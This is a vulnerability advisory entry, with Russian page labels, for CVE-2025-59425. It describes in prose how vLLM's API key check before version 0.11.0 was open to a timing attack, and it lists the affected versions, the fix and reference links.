Описание
vLLM is vulnerable to timing attack at bearer auth
Summary
The API key support in vLLM performed validation using a method that was vulnerable to a timing attack. This could potentially allow an attacker to discover a valid API key using an approach more efficient than brute force.
Details
API key validation used a string comparison that will take longer the more characters the provided API key gets correct. Data analysis across many attempts can allow an attacker to determine when it finds the next correct character in the key sequence.
Impact
Deployments relying on vLLM's built-in API key validation are vulnerable to authentication bypass using this technique.
Ссылки
- https://github.com/vllm-project/vllm/security/advisories/GHSA-wr9h-g72x-mwhm
- https://nvd.nist.gov/vuln/detail/CVE-2025-59425
- https://github.com/vllm-project/vllm/commit/ee10d7e6ff5875386c7f136ce8b5f525c8fcef48
- https://github.com/vllm-project/vllm/blob/4b946d693e0af15740e9ca9c0e059d5f333b1083/vllm/entrypoints/openai/api_server.py#L1270-L1274
- https://github.com/vllm-project/vllm/releases/tag/v0.11.0
Пакеты
vllm
< 0.11.0
0.11.0
Связанные уязвимости
vLLM is an inference and serving engine for large language models (LLMs). Before version 0.11.0rc2, the API key support in vLLM performs validation using a method that was vulnerable to a timing attack. API key validation uses a string comparison that takes longer the more characters the provided API key gets correct. Data analysis across many attempts could allow an attacker to determine when it finds the next correct character in the key sequence. Deployments relying on vLLM's built-in API key validation are vulnerable to authentication bypass using this technique. Version 0.11.0rc2 fixes the issue.
vLLM is an inference and serving engine for large language models (LLM ...
Уязвимость класса AuthenticationMiddleware библиотеки для работы с большими языковыми моделями (LLM) vLLM, позволяющая нарушителю обойти ограничения безопасности и раскрыть защищаемую информацию